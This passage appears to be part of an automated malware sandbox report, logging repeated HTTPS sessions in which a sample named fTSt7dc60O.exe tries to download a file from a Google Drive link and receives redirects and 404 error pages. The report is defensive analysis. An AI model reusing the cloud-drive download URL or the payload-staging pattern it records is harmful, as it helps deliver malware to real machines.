                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    57192.168.2.752242142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:09 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:09 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6YCsH2EuQyep-wImEfpcXIyghGGUnCucgEwKk7kWInKiiyHEFO2m46bAoHZkx6KMyk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:09 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-CYk39Zhs9tEnp8pXEabm4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 65 6b 52 74 50 75 57 73 62 6f 66 6d 59 72 42 5a 46 33 72 36 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RekRtPuWsbofmYrBZF3r6A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    58192.168.2.752243172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:10 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:11 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:10 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-92WQZrogbPIsjYWpEXgkiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    59192.168.2.752244142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:11 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:12 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQxFF9m1p7SgXmQmgCIoH_o0QEzvSqXbOgMJ0f3kvD8UXazqjuZwqoIWakRsu0aD0lA
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:12 GMT
                                                    Content-Security-Policy: script-src 'nonce--jXm5Q9HdG232UYPwLzM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 70 5a 6b 79 45 67 52 79 72 58 4d 38 42 6c 4f 6e 6f 54 71 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="epZkyEgRyrXM8BlOnoTqmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    60192.168.2.752245172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:12 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:13 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:13 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-DGzihbFqdxfLbcEku2JS7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    61192.168.2.752246142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:13 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:14 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC5LbuqbSvEbqSLdGWvuLGqnxUjQ2BD2TuRfWPix9tryIF6dBEE8LZCj7rQ3YFnCboWOw9JWCOI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:14 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-nwpEcFl54kIq_lOwwzg0Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 69 59 6c 39 34 45 62 46 4f 50 75 39 4f 34 71 31 31 51 34 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6iYl94EbFOPu9O4q11Q4Ig">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    62192.168.2.752247172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:15 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:15 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:15 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Go-Ad2h2cNu1xzGl910-uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    63192.168.2.752248142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:16 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:16 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC5Gr6TEF7uEmVvbqw8DUGGuffu-VDXaxs5Ue-FiRjd3fE5aMZ3iGD9kA45FIKsNiU9tgWvC0Ks
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:16 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-JbJgZJ1SAzmhQgKqq-3dLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 68 4c 45 4a 33 44 75 31 4b 7a 41 4c 77 41 47 35 50 4d 5f 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bhLEJ3Du1KzALwAG5PM_Aw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    64192.168.2.752249172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:17 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
